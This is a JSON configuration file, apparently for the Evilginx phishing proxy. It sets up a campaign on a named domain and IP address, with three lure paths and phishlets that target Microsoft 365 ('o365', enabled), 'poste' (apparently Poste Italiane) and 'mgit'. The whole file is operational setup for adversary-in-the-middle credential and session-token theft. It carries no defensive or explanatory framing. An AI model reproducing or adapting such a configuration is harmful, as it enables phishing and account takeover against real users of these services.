{
  "blacklist": {
    "mode": "unauth"
  },
  "general": {
    "autocert": true,
    "bind_ipv4": "",
    "dns_port": 5300,
    "domain": "progettocer.xyz",
    "external_ipv4": "143.198.1.168",
    "https_port": 443,
    "ipv4": "",
    "unauth_url": "https://progettocer.xyz"
  },
  "lures": [
    {
      "hostname": "",
      "id": "",
      "info": "",
      "og_desc": "",
      "og_image": "",
      "og_title": "",
      "og_url": "",
      "path": "/cUjUiazh",
      "paused": 0,
      "phishlet": "mgit",
      "redirect_url": "",
      "redirector": "",
      "ua_filter": ""
    },
    {
      "hostname": "",
      "id": "",
      "info": "",
      "og_desc": "",
      "og_image": "",
      "og_title": "",
      "og_url": "",
      "path": "/feUPAfBy",
      "paused": 0,
      "phishlet": "poste",
      "redirect_url": "",
      "redirector": "",
      "ua_filter": ""
    },
    {
      "hostname": "",
      "id": "",
      "info": "",
      "og_desc": "",
      "og_image": "",
      "og_title": "",
      "og_url": "",
      "path": "/PoHHtlVf",
      "paused": 0,
      "phishlet": "o365",
      "redirect_url": "",
      "redirector": "",
      "ua_filter": ""
    }
  ],
  "phishlets": {
    "mgit": {
      "hostname": "progettocer.xyz",
      "unauth_url": "",
      "enabled": false,
      "visible": true
    },
    "o365": {
      "hostname": "progettocer.xyz",
      "unauth_url": "",
      "enabled": true,
      "visible": true
    },
    "poste": {
      "hostname": "progettocer.xyz",
      "unauth_url": "",
      "enabled": false,
      "visible": true
    }
  }
}